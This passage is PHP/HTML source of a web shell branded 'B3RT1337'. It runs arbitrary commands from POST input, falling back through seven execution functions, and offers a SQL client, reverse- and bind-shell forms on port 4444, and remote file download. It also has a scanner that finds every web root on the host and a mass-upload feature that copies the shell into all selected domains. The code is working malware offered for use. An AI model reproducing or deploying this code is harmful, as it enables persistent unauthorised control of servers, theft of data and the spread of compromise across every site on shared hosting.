0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = @proc_open($cmd, $descriptorspec, $pipes);
if (is_resource($process)) {
$stdout = stream_get_contents($pipes[1]);
fclose($pipes[1]);
$stderr = stream_get_contents($pipes[2]);
fclose($pipes[2]);
$return_value = proc_close($process);
if ($return_value === 0 && !empty($stdout)) {
return ['success' => true, 'output' => $stdout];
}
}
}
// Method 2: shell_exec
if (function_exists('shell_exec')) {
$result = @shell_exec($cmd);
if ($result !== null && $result !== false && $result !== '') {
return ['success' => true, 'output' => $result];
}
}
// Method 3: exec
if (function_exists('exec')) {
$output_lines = array();
$return_var = -1;
@exec($cmd, $output_lines, $return_var);
if ($return_var === 0 && !empty($output_lines)) {
return ['success' => true, 'output' => implode("\n", $output_lines)];
}
}
// Method 4: system
if (function_exists('system')) {
ob_start();
$return_var = -1;
@system($cmd, $return_var);
$result = ob_get_clean();
if ($return_var === 0 && !empty($result)) {
return ['success' => true, 'output' => $result];
}
}
// Method 5: passthru
if (function_exists('passthru')) {
ob_start();
$return_var = -1;
@passthru($cmd, $return_var);
$result = ob_get_clean();
if ($return_var === 0 && !empty($result)) {
return ['success' => true, 'output' => $result];
}
}
// Method 6: popen
if (function_exists('popen')) {
$handle = @popen($cmd, 'r');
if (is_resource($handle)) {
$result = '';
while (!feof($handle)) {
$result .= fread($handle, 4096);
}
pclose($handle);
if (!empty($result)) {
return ['success' => true, 'output' => $result];
}
}
}
// Method 7: backticks (same as shell_exec but different syntax)
if (function_exists('shell_exec')) {
$result = @`$cmd`;
if ($result !== null && $result !== false && $result !== '') {
return ['success' => true, 'output' => $result];
}
}
return ['success' => false, 'output' => ''];
}
$result = execute_command($_POST['command']);
if ($result['success'] && !empty($result['output'])) {
$output = preg_split('/\r\n|\r|\n/', trim($result['output']));
echo "<table class='table table-dark table-sm table-striped table-bordered'>";
echo "<thead><tr><th colspan='10' class='text-center'>Command Output: " . htmlspecialchars($_POST['command']) . "</th></tr></thead>";
echo "<tbody>";
foreach ($output as $line) {
if (trim($line) === '') continue;
// Split by whitespace but keep quoted strings intact
$columns = preg_split('/\s+/', trim($line));
$columns = array_map('trim', $columns);
$columns = array_filter($columns, function($col) {
return $col !== '';
});
if (!empty($columns)) {
echo "<tr>";
foreach ($columns as $column) {
echo "<td>" . htmlspecialchars($column) . "</td>";
}
// Fill remaining columns to maintain table structure
$remaining = 10 - count($columns);
for ($i = 0; $i < $remaining; $i++) {
echo "<td></td>";
}
echo "</tr>";
} else {
// For empty lines, just show the line as is
echo "<tr><td colspan='10'>" . htmlspecialchars($line) . "</td></tr>";
}
}
echo "</tbody></table>";
} else {
// Try to get error output
$error_output = '';
if (function_exists('shell_exec')) {
$error_output = @shell_exec($_POST['command'] . " 2>&1");
}
if (empty($error_output)) {
$error_output = "Command executed but returned no output or failed.";
}
echo "<pre class='text-danger border p-3'>Error/Output:\n" . htmlspecialchars($error_output) . "</pre>";
}
?>
</div>
<?php endif; ?>
</div>
<!-- Database Tab -->
<div class="tab-pane fade" id="database" role="tabpanel">
<div class="card card-body bg-dark mb-3">
<h5>Database Connection</h5>
<form action="" method="post">
<input type="hidden" name="active_tab" value="database">
<div class="row g-2 mb-2">
<div class="col-md-6">
<input type="text" class="form-control form-control-sm" name="db_host" placeholder="Host" value="<?= isset($_POST['db_host']) ? htmlspecialchars($_POST['db_host']) : 'localhost' ?>">
</div>
<div class="col-md-6">
<input type="text" class="form-control form-control-sm" name="db_name" placeholder="Database (optional)" value="<?= isset($_POST['db_name']) ? htmlspecialchars($_POST['db_name']) : '' ?>">
</div>
</div>
<div class="row g-2 mb-2">
<div class="col-md-6">
<input type="text" class="form-control form-control-sm" name="db_user" placeholder="Username" value="<?= isset($_POST['db_user']) ? htmlspecialchars($_POST['db_user']) : 'root' ?>">
</div>
<div class="col-md-6">
<input type="password" class="form-control form-control-sm" name="db_pass" placeholder="Password">
</div>
</div>
<button type="submit" class="btn btn-outline-light btn-sm">Connect</button>
</form>
</div>
<?php if (isset($_SESSION['db_conn'])) : ?>
<div class="card card-body bg-dark mb-3">
<h5>SQL Query</h5>
<form action="" method="post">
<input type="hidden" name="active_tab" value="database">
<div class="mb-2">
<textarea name="sql_query" rows="3" class="form-control form-control-sm" placeholder="SELECT * FROM users"><?= isset($_POST['sql_query']) ? htmlspecialchars($_POST['sql_query']) : '' ?></textarea>
</div>
<button type="submit" class="btn btn-outline-light btn-sm">Execute</button>
</form>
</div>
<?php if (isset($_SESSION['sql_result'])) : ?>
<div class="card card-body bg-dark">
<h5>Query Results</h5>
<div class="table-responsive">
<table class="table table-dark table-sm">
<thead>
<tr>
<?php if (!empty($_SESSION['sql_result'])) : ?>
<?php foreach (array_keys($_SESSION['sql_result'][0]) as $column) : ?>
<th><?= htmlspecialchars($column) ?></th>
<?php endforeach; ?>
<?php endif; ?>
</tr>
</thead>
<tbody>
<?php foreach ($_SESSION['sql_result'] as $row) : ?>
<tr>
<?php foreach ($row as $value) : ?>
<td><?= htmlspecialchars($value) ?></td>
<?php endforeach; ?>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
</div>
<?php unset($_SESSION['sql_result']); endif; ?>
<?php endif; ?>
</div>
<!-- Shell Tab -->
<div class="tab-pane fade" id="shell" role="tabpanel">
<div class="card card-body bg-dark mb-3">
<h5>Reverse Shell</h5>
<form action="" method="post">
<input type="hidden" name="active_tab" value="shell">
<div class="row g-2">
<div class="col-md-8">
<input type="text" class="form-control form-control-sm" name="reverse_ip" placeholder="Your IP" value="<?= isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? htmlspecialchars($_SERVER['HTTP_X_FORWARDED_FOR']) : (isset($_SERVER['REMOTE_ADDR']) ? htmlspecialchars($_SERVER['REMOTE_ADDR']) : '') ?>">
</div>
<div class="col-md-2">
<input type="number" class="form-control form-control-sm" name="reverse_port" placeholder="Port" value="4444">
</div>
<div class="col-md-2">
<button type="submit" class="btn btn-outline-light btn-sm w-100">Connect</button>
</div>
</div>
</form>
</div>
<div class="card card-body bg-dark">
<h5>Bind Shell</h5>
<form action="" method="post">
<input type="hidden" name="active_tab" value="shell">
<div class="row g-2">
<div class="col-md-2">
<input type="number" class="form-control form-control-sm" name="bind_port" placeholder="Port" value="4444">
</div>
<div class="col-md-2">
<button type="submit" class="btn btn-outline-light btn-sm w-100">Listen</button>
</div>
<div class="col-md-8">
<small class="text-muted">After starting, connect with: nc [IP] [PORT]</small>
</div>
</div>
</form>
</div>
</div>
<!-- Download/Upload Tab -->
<div class="tab-pane fade" id="download" role="tabpanel">
<!-- Download from URL -->
<div class="card card-body bg-dark mb-3">
<h5><i class="fa fa-download"></i> Download from URL</h5>
<form action="" method="post" enctype="multipart/form-data">
<input type="hidden" name="active_tab" value="download">
<div class="row g-2 mb-2">
<div class="col-md-8">
<input type="url" class="form-control form-control-sm" name="remote_url" placeholder="http://example.com/file.txt" required>
</div>
<div class="col-md-4">
<input type="text" class="form-control form-control-sm" name="local_path" placeholder="save_as.txt" value="<?= htmlspecialchars($path) ?>/">
</div>
</div>
<button type="submit" name="download_url" class="btn btn-outline-light btn-sm">Download File</button>
</form>
</div>
<!-- Mass Downloader -->
<div class="card card-body bg-dark mb-3">
<h5><i class="fa fa-cloud-download"></i> Mass Downloader</h5>
<form action="" method="post" enctype="multipart/form-data">
<input type="hidden" name="active_tab" value="download">
<div class="mb-2">
<textarea name="mass_urls" rows="5" class="form-control form-control-sm" placeholder="http://example.com/file1.jpg http://example.com/file2.jpg http://example.com/file3.jpg" required></textarea>
</div>
<div class="row g-2 mb-2">
<div class="col-md-8">
<input type="text" class="form-control form-control-sm" name="mass_path" placeholder="Save to directory" value="<?= htmlspecialchars($path) ?>">
</div>
<div class="col-md-4">
<button type="submit" name="mass_download" class="btn btn-outline-light btn-sm w-100">Download All</button>
</div>
</div>
</form>
</div>
<!-- Direct Upload -->
<div class="card card-body bg-dark mb-3">
<h5><i class="fa fa-upload"></i> Direct Upload</h5>
<form action="" method="post" enctype="multipart/form-data">
<input type="hidden" name="active_tab" value="download">
<div class="mb-2">
<input type="file" class="form-control form-control-sm" name="direct_upload[]" multiple required>
</div>
<div class="row g-2">
<div class="col-md-8">
<input type="text" class="form-control form-control-sm" name="upload_path" placeholder="Upload directory" value="<?= htmlspecialchars($path) ?>">
</div>
<div class="col-md-4">
<button type="submit" name="direct_upload_btn" class="btn btn-outline-light btn-sm w-100">Upload Files</button>
</div>
</div>
</form>
</div>
<!-- File Manager Shortcut -->
<div class="card card-body bg-dark">
<h5><i class="fa fa-folder"></i> Quick Actions</h5>
<div class="row">
<div class="col-md-6">
<a href="?dir=<?= urlencode($path) ?>" class="btn btn-outline-light btn-sm w-100 mb-2">
<i class="fa fa-refresh"></i> Refresh Current Directory
</a>
</div>
<div class="col-md-6">
<a href="?dir=<?= urlencode(dirname($path)) ?>" class="btn btn-outline-light btn-sm w-100 mb-2">
<i class="fa fa-level-up"></i> Go to Parent Directory
</a>
</div>
</div>
</div>
</div>
<!-- Mass Upload Tab -->
<div class="tab-pane fade" id="massupload" role="tabpanel">
<!-- Domain List -->
<div class="card card-body bg-dark mb-3">
<h5><i class="fa fa-globe"></i> Available Domains</h5>
<div class="mb-2">
<button type="button" class="btn btn-outline-info btn-sm" onclick="deepScanDomains()">
<i class="fa fa-search"></i> Deep Scan for Domains
</button>
<a href="?dir=<?= urlencode('/home/' . get_current_user()) ?>" class="btn btn-outline-secondary btn-sm">
<i class="fa fa-folder-open"></i> Go to Home
</a>
<small class="text-muted ms-2">Click "Deep Scan" to find all domains</small>
</div>
<div id="domainsContainer">
<?php
// ADVANCED DOMAIN SCANNER - Recursively finds web roots
function findWebRoots($base_path, $depth = 0, $max_depth = 3) {
$found = [];
if ($depth > $max_depth || !is_dir($base_path)) return $found;
$items = @scandir($base_path);
if (!$items) return $found;
foreach ($items as $item) {
if ($item == '.' || $item == '..') continue;
if (strpos($item, '.') === 0) continue; // Skip hidden
$full_path = $base_path . '/' . $item;
if (!is_dir($full_path)) continue;
// Skip common system dirs
$skip_dirs = ['tmp', 'logs', 'cache', 'backups', 'etc', 'bin', 'dev', 'proc', 'sys', 'usr', 'lib', 'mail', 'ssl', '.cpanel', '.softaculous'];
if (in_array($item, $skip_dirs)) continue;
// Check if this looks like a web root
$is_web_root = false;
// Has index.php?
if (file_exists($full_path . '/index.php')) {
$is_web_root = true;
}
// Has wp-config.php?
elseif (file_exists($full_path . '/wp-config.php')) {
$is_web_root = true;
}
// Has .htaccess?
elseif (file_exists($full_path . '/.htaccess')) {
$is_web_root = true;
}
// Has public_html subfolder? (then that's the web root, not this)
elseif (is_dir($full_path . '/public_html')) {
// Add the public_html as web root
$public_html = $full_path . '/public_html';
if (is_dir($public_html)) {
$found[$item . '/public_html'] = [
'name' => $item . '/public_html',
'web_root' => $public_html,
'type' => 'cPanel style'
];
}
continue; // Don't mark the parent as web root
}
if ($is_web_root) {
$found[$item] = [
'name' => $item,
'web_root' => $full_path,
'type' => 'web root'
];
} else {
// Recursively scan deeper
$deeper = findWebRoots($full_path, $depth + 1, $max_depth);
$found = array_merge($found, $deeper);
}
}
return $found;
}
// Start scanning from common locations
$web_roots = [];
$scan_locations = [
'/home/' . get_current_user(),
$_SERVER['DOCUMENT_ROOT'],
dirname($_SERVER['DOCUMENT_ROOT']),
'/var/www',
'/var/www/html'
];
foreach ($scan_locations as $loc) {
if (is_dir($loc)) {
$web_roots = array_merge($web_roots, findWebRoots($loc, 0, 3));
}
}
// Also check public_html subfolders directly
$public_html = $_SERVER['DOCUMENT_ROOT'] ?? '/home/' . get_current_user() . '/public_html';
if (is_dir($public_html)) {
$items = scandir($public_html);
foreach ($items as $item) {
if ($item == '.' || $item == '..') continue;
if (strpos($item, '.') === 0) continue;
$full = $public_html . '/' . $item;
if (is_dir($full)) {
// Check if it's likely a domain (contains dot or has index)
if (strpos($item, '.') !== false || file_exists($full . '/index.php')) {
$web_roots[$item] = [
'name' => $item,
'web_root' => $full,
'type' => 'public_html subfolder'
];
}
}
}
}
// Remove duplicates and sort
ksort($web_roots);
if (empty($web_roots)) {
echo '<div class="alert alert-warning">';
echo '<i class="fa fa-info-circle"></i> No web roots found. ';
echo 'Try navigating to a folder that might contain websites.';
echo '</div>';
} else {
echo '<div class="row">';
foreach ($web_roots as $key => $info) {
?>
<div class="col-md-4 mb-2">
<div class="card bg-dark border-success">
<div class="card-body p-2">
<div class="form-check">
<input class="form-check-input domain-checkbox" type="checkbox"
value="<?= htmlspecialchars($info['web_root']) ?>"
id="domain_<?= md5($key) ?>">
<label class="form-check-label text-success" for="domain_<?= md5($key) ?>">
<i class="fa fa-globe"></i> <?= htmlspecialchars($key) ?>
</label>
</div>
<small class="text-muted d-block">Path: <?= htmlspecialchars($info['web_root']) ?></small>
<small class="text-muted d-block">
<a href="?dir=<?= urlencode($info['web_root']) ?>" class="text-info" target="_blank">
<i class="fa fa-folder-open"></i> Browse
</a>
</small>
</div>
</div>
</div>
<?php
}
echo '</div>';
}
?>
</div>
<!-- Select All / Deselect All Buttons -->
<div class="mt-2">
<button type="button" class="btn btn-outline-light btn-sm" onclick="selectAllDomains(true)">
<i class="fa fa-check-square"></i> Select All
</button>
<button type="button" class="btn btn-outline-light btn-sm" onclick="selectAllDomains(false)">
<i class="fa fa-square-o"></i> Deselect All
</button>
</div>
</div>
<!-- Upload File to Selected Domains -->
<div class="card card-body bg-dark mb-3">
<h5><i class="fa fa-cloud-upload"></i> Upload File to Selected Domains</h5>
<form action="" method="post" enctype="multipart/form-data" id="massUploadForm">
<input type="hidden" name="active_tab" value="massupload">
<input type="hidden" name="mass_upload_action" value="upload">
<div class="mb-3">
<label class="form-label">Select File to Upload</label>
<input type="file" class="form-control form-control-sm" name="mass_upload_file" required>
<small class="text-muted">This file will be uploaded to all selected domains</small>
</div>
<div class="mb-3">
<label class="form-label">Target Filename (optional)</label>
<input type="text" class="form-control form-control-sm" name="target_filename" placeholder="Leave empty to keep original name">
<small class="text-muted">Rename file when uploading (e.g., shell.php, index.php)</small>
</div>
<div class="mb-3">
<label class="form-label">Selected Domains (<span id="selectedCount">0</span>)</label>
<div id="selectedDomainsList" class="small text-muted" style="max-height: 100px; overflow-y: auto;">
None selected
</div>
</div>
<button type="submit" name="mass_upload_submit" class="btn btn-success btn-sm" onclick="return confirm('Upload to all selected domains?')">
<i class="fa fa-cloud-upload"></i> Upload to Selected Domains
</button>
</form>
</div>
<!-- Upload Shell to Selected Domains -->
<div class="card card-body bg-dark mb-3">
<h5><i class="fa fa-bolt"></i> Upload Shell to Selected Domains</h5>
<form action="" method="post" id="uploadShellForm">
<input type="hidden" name="active_tab" value="massupload">
<input type="hidden" name="mass_upload_action" value="shell">
<div class="mb-3">
<label class="form-label">Shell Filename</label>
<input type="text" class="form-control form-control-sm" name="shell_filename" value="0xB3R7Sh311v2.php" required>
<small class="text-muted">The current shell will be copied with this filename</small>
</div>
<div class="mb-3">
<label class="form-label">Selected Domains (<span id="shellSelectedCount">0</span>)</label>
<div id="shellSelectedDomainsList" class="small text-muted" style="max-height: 100px; overflow-y: auto;">
None selected
</div>
</div>
<button type="submit" name="mass_upload_submit" class="btn btn-danger btn-sm" onclick="return confirm('Upload shell to all selected domains?')">
<i class="fa fa-bolt"></i> Upload Shell
</button>
</form>
</div>
<!-- Create File in Selected Domains -->
<div class="card card-body bg-dark mb-3">
<h5><i class="fa fa-file-code"></i> Create File in Selected Domains</h5>
<form action="" method="post" id="createFileForm">
<input type="hidden" name="active_tab" value="massupload">
<input type="hidden" name="mass_upload_action" value="create">
<div class="mb-3">
<label class="form-label">Filename</label>
<input type="text" class="form-control form-control-sm" name="create_filename" placeholder="e.g., config.php" required>
</div>
<div class="mb-3">
<label class="form-label">File Content</label>
<textarea name="create_content" rows="5" class="form-control form-control-sm font-monospace" placeholder="Enter file content..."></textarea>
</div>
<div class="mb-3">
<label class="form-label">Selected Domains (<span id="createSelectedCount">0</span>)</label>
<div id="createSelectedDomainsList" class="small text-muted" style="max-height: 100px; overflow-y: auto;">
None selected
</div>
</div>
<button type="submit" name="mass_upload_submit" class="btn btn-primary btn-sm" onclick="return confirm('Create file in all selected domains?')">
<i class="fa fa-file-code"></i> Create File
</button>
</form>
</div>
<!-- Results Display -->
<?php if (isset($_SESSION['mass_upload_results'])): ?>
<div class="card card-body bg-dark">
<h5><i class="fa fa-list"></i> Upload Results</h5>
<div class="table-responsive">
<table class="table table-dark table-sm table-bordered">
<thead>
<tr>
<th>Domain</th>
<th>Status</th>
<th>Message</th>
</tr>
</thead>
<tbody>
<?php foreach ($_SESSION['mass_upload_results'] as $result): ?>
<tr>
<td><?= htmlspecialchars($result['domain']) ?></br>
<td>
<?php if ($result['success']): ?>
<span class="badge bg-success">SUCCESS</span>
<?php else: ?>
<span class="badge bg-danger">FAILED</span>
<?php endif; ?>
</br>
<td><?= htmlspecialchars($result['message']) ?></br>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
<?php unset($_SESSION['mass_upload_results']); ?>
</div>
<?php endif; ?>
<!-- JavaScript for domain selection and deep scan -->
<script>
function selectAllDomains(select) {
document.querySelectorAll('.domain-checkbox').forEach(cb => {
cb.checked = select;
});
updateSelectedDomains();
}
function updateSelectedDomains() {
const selected = [];
const selectedPaths = [];
document.querySelectorAll('.domain-checkbox:checked').forEach(cb => {
const label = cb.nextElementSibling;
const domainName = label ? label.textContent.trim() : 'Unknown';
selected.push(domainName);
selectedPaths.push(cb.value);
});
// Update counts and lists for all forms
document.getElementById('selectedCount').textContent = selected.length;
document.getElementById('shellSelectedCount').textContent = selected.length;
document.getElementById('createSelectedCount').textContent = selected.length;
const listHtml = selected.length > 0 ? selected.join('<br>') : 'None selected';
document.getElementById('selectedDomainsList').innerHTML = listHtml;
document.getElementById('shellSelectedDomainsList').innerHTML = listHtml;
document.getElementById('createSelectedDomainsList').innerHTML = listHtml;
// Add hidden inputs to forms
updateFormHiddenInputs(selectedPaths);
}
function updateFormHiddenInputs(selectedPaths) {
// Remove existing hidden inputs
['massUploadForm', 'uploadShellForm', 'createFileForm'].forEach(formId => {
const form = document.getElementById(formId);
const oldInputs = form.querySelectorAll('input[name="selected_domains[]"]');
oldInputs.forEach(input => input.remove());
// Add new hidden inputs for selected domains
selectedPaths.forEach(path => {
const input = document.createElement('input');
input.type = 'hidden';
input.name = 'selected_domains[]';
input.value = path;
form.appendChild(input);
});
});
}
function deepScanDomains() {
// This would ideally be an AJAX call to a server-side scanner,
// but for simplicity, we'll just refresh the page with a flag
window.location.href = window.location.pathname + '?deep_scan=1&tab=massupload';
}
// Update on checkbox change
document.querySelectorAll('.domain-checkbox').forEach(cb => {
cb.addEventListener('change', updateSelectedDomains);
});
// Initial update
updateSelectedDomains();
</script>
</div>
<!-- System Info Tab -->
<div class="tab-pane fade" id="info" role="tabpanel">
<!-- System Information -->
<div class="card card-body bg-dark mb-3">
<h5><i class="fa fa-server"></i> System Information</h5>
<table class="table table-dark table-sm table-bordered">
<tr>
<th width="30%">Hostname</th>
<td><?= htmlspecialchars(gethostname()) ?></br>
</tr>
<tr>
<th>OS/Architecture</th>
<td><?= htmlspecialchars(php_uname('s') . ' ' . php_uname('r') . ' ' . php_uname('m')) ?></br>
</tr>
<tr>
<th>System Details</th>
<td><?= htmlspecialchars($func[0]()) ?></br>
</tr>
<tr>
<th>Server Software</th>
<td><?= htmlspecialchars($_SERVER['SERVER_SOFTWARE'] ?? 'Unknown') ?></br>
</tr>
<tr>
<th>Server Protocol</th>
<td><?= htmlspecialchars($_SERVER['SERVER_PROTOCOL'] ?? 'Unknown') ?></br>
</tr>
<tr>
<th>Server IP</th>
<td><?= !@$_SERVER['SERVER_ADDR'] ? htmlspecialchars($func[19]($_SERVER['SERVER_NAME'] ?? 'localhost')) : htmlspecialchars(@$_SERVER['SERVER_ADDR']) ?></br>
</tr>
<tr>
<th>Server Port</th>
<td><?= htmlspecialchars($_SERVER['SERVER_PORT'] ?? 'Unknown') ?></br>
</tr>
<tr>
<th>Document Root</th>
<td><?= htmlspecialchars($_SERVER['DOCUMENT_ROOT'] ?? 'Unknown') ?></br>
</tr>
<tr>
<th>Current User</th>
<td><?= htmlspecialchars($func[36]()) ?> (UID: <?= @getmyuid() ?>, GID: <?= @getmygid() ?>)</br>
</tr>
<tr>
<th>Current Directory</th>
<td><?= htmlspecialchars($func[12]()) ?></br>
</tr>
<tr>
<th>Script Path</th>
<td><?= htmlspecialchars($_SERVER['SCRIPT_FILENAME'] ?? 'Unknown') ?></br>
</tr>
<tr>
<th>Client IP</th>
<td><?= htmlspecialchars($_SERVER['REMOTE_ADDR'] ?? 'Unknown') ?> (<?= htmlspecialchars($_SERVER['HTTP_USER_AGENT'] ?? 'Unknown') ?>)</br>
</tr>
</table>
</div>
<!-- PHP Configuration -->
<div class="card card-body bg-dark mb-3">
<h5><i class="fa fa-cog"></i> PHP Configuration</h5>
<table class="table table-dark table-sm table-bordered">
<?php
$php_configs = [
'PHP Version' => phpversion(),
'PHP SAPI' => php_sapi_name(),
'PHP OS' => PHP_OS,
'PHP Architecture' => (PHP_INT_SIZE * 8) . '-bit',
'Memory Limit' => ini_get('memory_limit'),
'Max Execution Time' => ini_get('max_execution_time') . ' seconds',
'Max Input Time' => ini_get('max_input_time') . ' seconds',
'Upload Max Filesize' => ini_get('upload_max_filesize'),
'Post Max Size' => ini_get('post_max_size'),
'Max File Uploads' => ini_get('max_file_uploads'),
'Allow URL Fopen' => ini_get('allow_url_fopen') ? 'Enabled ✅' : 'Disabled ❌',
'Allow URL Include' => ini_get('allow_url_include') ? 'Enabled ⚠️' : 'Disabled ✅',
'Safe Mode' => ini_get('safe_mode') ? 'Enabled ⚠️' : 'Disabled ✅',
'Open Basedir' => ini_get('open_basedir') ?: 'None ✅',
'Disable Functions' => $show_ds,
'Display Errors' => ini_get('display_errors') ? 'On' : 'Off',
'Error Reporting' => error_reporting(),
'Short Open Tag' => ini_get('short_open_tag') ? 'On' : 'Off',
'Session Save Path' => ini_get('session.save_path') ?: 'Default',
'Session Name' => session_name(),
];
foreach ($php_configs as $key => $value) {
echo "<tr><th width='30%'>$key</th><td>" . htmlspecialchars($value) . "</br>\n";
}
?>
</table>
</div>
<!-- Loaded Extensions -->
<div class="card card-body bg-dark mb-3">
<h5><i class="fa fa-puzzle-piece"></i> Loaded Extensions (<?= count(get_loaded_extensions()) ?>)</h5>
<div class="row">
<?php
$extensions = get_loaded_extensions();
sort($extensions);
$cols = array_chunk($extensions, ceil(count($extensions) / 3));
foreach ($cols as $col) {
echo "<div class='col-md-4'>";
echo "<ul class='list-unstyled'>";
foreach ($col as $ext) {
$ext_info = '';
if ($ext == 'curl') $ext_info = ' 🌐';
elseif ($ext == 'mysqli' || $ext == 'mysql' || $ext == 'pdo_mysql') $ext_info = ' 🗄️';
elseif ($ext == 'gd') $ext_info = ' 🖼️';
elseif ($ext == 'mbstring') $ext_info = ' 🔤';
elseif ($ext == 'json') $ext_info = ' 📦';
elseif ($ext == 'xml') $ext_info = ' 📄';
elseif ($ext == 'zip') $ext_info = ' 📦';
elseif ($ext == 'openssl') $ext_info = ' 🔒';
elseif ($ext == 'sockets') $ext_info = ' 🔌';
echo "<li><small>" . htmlspecialchars($ext) . "$ext_info</small></li>";
}
echo "</ul></div>";
}
?>
</div>
</div>
<!-- Server Environment -->
<div class="card card-body bg-dark mb-3">
<h5><i class="fa fa-globe"></i> Server Environment</h5>
<table class="table table-dark table-sm table-bordered">
<?php
$env_vars = [
'Server Name' => $_SERVER['SERVER_NAME'] ?? 'Unknown',
'Gateway Interface' => $_SERVER['GATEWAY_INTERFACE'] ?? 'Unknown',
'Server Admin' => $_SERVER['SERVER_ADMIN'] ?? 'Unknown',
'Request Time' => date('Y-m-d H:i:s', $_SERVER['REQUEST_TIME'] ?? time()),
'HTTP Host' => $_SERVER['HTTP_HOST'] ?? 'Unknown',
'HTTPS' => isset($_SERVER['HTTPS']) ? 'On 🔒' : 'Off',
'Request Method' => $_SERVER['REQUEST_METHOD'] ?? 'Unknown',
'Request URI' => $_SERVER['REQUEST_URI'] ?? 'Unknown',
'Query String' => $_SERVER['QUERY_STRING'] ?? 'None',
];
foreach ($env_vars as $key => $value) {
echo "<tr><th width='30%'>$key</th><td>" . htmlspecialchars($value) . "</br>\n";
}
?>
</table>
</div>
<!-- Disk Usage -->
<div class="card card-body bg-dark mb-3">
<h5><i class="fa fa-hdd"></i> Disk Usage</h5>
<table class="table table-dark table-sm table-bordered">
<?php
$paths_to_check = [
'Current Directory' => $path,
'Root Directory' => '/',
'Temp Directory' => sys_get_temp_dir(),
];
if (isset($_SERVER['DOCUMENT_ROOT'])) {
$paths_to_check['Document Root'] = $_SERVER['DOCUMENT_ROOT'];
}
foreach ($paths_to_check as $name => $check_path) {
if (is_dir($check_path)) {
$total = @disk_total_space($check_path);
$free = @disk_free_space($check_path);
if ($total && $free) {
$used = $total - $free;
$percent_used = round(($used / $total) * 100, 2);
echo "<tr>";
echo "<th width='30%'>$name</th>";
echo "<td>";
echo "Total: " . fsize2($total) . " | ";
echo "Used: " . fsize2($used) . " ($percent_used%) | ";
echo "Free: " . fsize2($free);
echo "<div class='progress mt-1' style='height: 5px;'>";
echo "<div class='progress-bar bg-success' style='width: $percent_used%'></div>";
echo "</div>";
echo "</br>";
echo "</tr>";
} else {
echo "<tr><th>$name</th><td>Cannot read disk space</br>\n";
}
}
}
?>
</table>
</div>
<!-- Network Information -->
<div class="card card-body bg-dark mb-3">
<h5><i class="fa fa-network-wired"></i> Network Information</h5>
<table class="table table-dark table-sm table-bordered">
<?php
// Get network interfaces if possible
if (function_exists('net_get_interfaces')) {
$interfaces = net_get_interfaces();
if ($interfaces) {
foreach ($interfaces as $iface => $details) {
if (isset($details['unicast']) && is_array($details['unicast'])) {
foreach ($details['unicast'] as $addr) {
if (isset($addr['address']) && filter_var($addr['address'], FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) {
echo "<tr><th width='30%'>$iface</th><td>" . htmlspecialchars($addr['address']) . "</br>\n";
}
}
}
}
}
} else {
// Try to get hostname IP
$hostname = gethostname();
$ip = gethostbyname($hostname);
echo "<tr><th>Hostname IP</th><td>" . htmlspecialchars($ip) . "</br>\n";
}
// External IP if possible
echo "<tr><th>External IP</th><td>" . htmlspecialchars($_SERVER['REMOTE_ADDR'] ?? 'Unknown') . "</br>\n";
?>
</table>
</div>
<!-- Security Checks -->
<div class="card card-body bg-dark">
<h5><i class="fa fa-shield-alt"></i> Security Checks</h5>
<table class="table table-dark table-sm table-bordered">
<?php
$security_checks = [
'Safe Mode' => !ini_get('safe_mode') ? '✅ Disabled (Good)' : '❌ Enabled (Bad)',
'Open Basedir' => !ini_get('open_basedir') ? '✅ Disabled (Good for webshell)' : '⚠️ Restricted to: ' . ini_get('open_basedir'),
'Disable Functions' => empty(ini_get('disable_functions')) ? '✅ None (Good)' : '⚠️ Some functions disabled',
'Allow URL Fopen' => ini_get('allow_url_fopen') ? '✅ Enabled (Good for downloads)' : '❌ Disabled',
'Allow URL Include' => !ini_get('allow_url_include') ? '✅ Disabled (Good)' : '❌ Enabled (Bad)',
'Display Errors' => ini_get('display_errors') ? '⚠️ Enabled (Info leak)' : '✅ Disabled (Good)',
'File Uploads' => ini_get('file_uploads') ? '✅ Enabled' : '❌ Disabled',
'Session Security' => session_id() ? '✅ Active' : '⚠️ No session',
];
foreach ($security_checks as $check => $status) {
echo "<tr><th width='30%'>$check</th><td>" . htmlspecialchars($status) . "</br>\n";
}
?>
</table>
</div>
</div>
</div>
<div class="mt-3 text-center text-muted">
© B3RT1337 - <?= date('Y') ?>
</div>
</div>
</div>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
<script>
// Preserve active tab on form submission
document.addEventListener('DOMContentLoaded', function() {
// Check if we have a stored tab or form submission
const urlParams = new URLSearchParams(window.location.search);
const formTab = <?= isset($_POST['active_tab']) ? "'" . $_POST['active_tab'] . "'" : 'null' ?>;
if (formTab) {
// Show the tab that was active during form submission
const tab = document.querySelector(`button[data-bs-target="#${formTab}"]`);
if (tab) {
new bootstrap.Tab(tab).show();
}
} else if (urlParams.get('tab')) {
// Show tab from URL parameter
const tab = document.querySelector(`button[data-bs-target="#${urlParams.get('tab')}"]`);
if (tab) {
new bootstrap.Tab(tab).show();
}
}
// Update URL when tabs change
document.querySelectorAll('button[data-bs-toggle="tab"]').forEach(tab => {
tab.addEventListener('shown.bs.tab', function (e) {
const target = e.target.getAttribute('data-bs-target').substring(1);
const url = new URL(window.location);
url.searchParams.set('tab', target);
window.history.replaceState({}, '', url);
});
});
// Set active_tab hidden field when any form is submitted
document.querySelectorAll('form').forEach(form => {
form.addEventListener('submit', function() {
const activeTab = document.querySelector('.nav-tabs .nav-link.active');
if (activeTab) {
const tabId = activeTab.getAttribute('data-bs-target').substring(1);
let hiddenInput = form.querySelector('input[name="active_tab"]');
if (!hiddenInput) {
hiddenInput = document.createElement('input');
hiddenInput.type = 'hidden';
hiddenInput.name = 'active_tab';
form.appendChild(hiddenInput);
}
hiddenInput.value = tabId;
}
});
});
});
<?php if (isset($_SESSION['message'])) : ?>
Swal.fire({
title: '<?= $_SESSION['status'] ?>',
text: '<?= $_SESSION['message'] ?>',
icon: '<?= $_SESSION['class'] ?>',
timer: 3000,
timerProgressBar: true
});
<?php endif; clear(); ?>
function jscopy() {
var jsCopy = document.getElementById("CopyFromTextArea");
jsCopy.focus();
jsCopy.select();
document.execCommand("copy");
Swal.fire({
title: 'Copied!',
text: 'Text copied to clipboard',
icon: 'success',
